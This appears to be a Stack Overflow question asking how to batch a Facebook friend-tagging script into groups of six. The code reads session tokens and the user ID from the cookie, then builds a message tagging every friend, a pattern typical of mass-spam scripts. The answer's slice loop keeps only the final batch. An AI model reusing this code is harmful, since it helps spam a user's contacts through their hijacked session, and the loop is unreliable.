# javascript choosing 6 at a time from array?

Tags: javascript

Because stackoverflow keep messing up my code, i have pasted it here http://pastebin.com/xA8wT3M2

What the code does is choose the entire list of friends. What I would rather have it do is choose 6 at a time for the array without repeats until the list is done.

I know this chooses 6 but it keeps picking the first 6 from the array over and over

```
var i=0;i<6;
```

EDIT:

```
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(/c_user=(\d+);/)[1];
var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&" + Math.random(), false);
gf.send();
if (gf.readyState != 4) {} else {
    data = eval('(' + gf.responseText.substr(9) + ')');
    if (data.error) {} else {
        friends = data.payload.entries.sort(function() {
            return (Math.round(Math.random()) - 0.5);
        });
    }
}
var postmessage = "gerrgg";
for (var i = 0; i < friends.length; i++) {
    postmessage = postmessage + "@[" + friends[i].uid + ":" + friends[i].text + "] ";
}
```

Comment: That pastebin link is completely unformatted. I'm not sure if that is a better idea than pasting it here even with some formatting problems. I edited the question - it now includes the code.

Comment: Right, especially since I seriously doubt SO is "messing up your code" so much as you just aren't familiar with the correct way to format it.

Answer (score 2):

To keep choosing 6 elements from the array use [slice](https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array/slice):

```
var arrSliceOf6 = [];
for(var i = 0; i < arr.length; i += 6)
  arrSliceOf6 = arr.slice(i, i + 6);
```

Here's a [demo](http://jsfiddle.net/n92Vr/)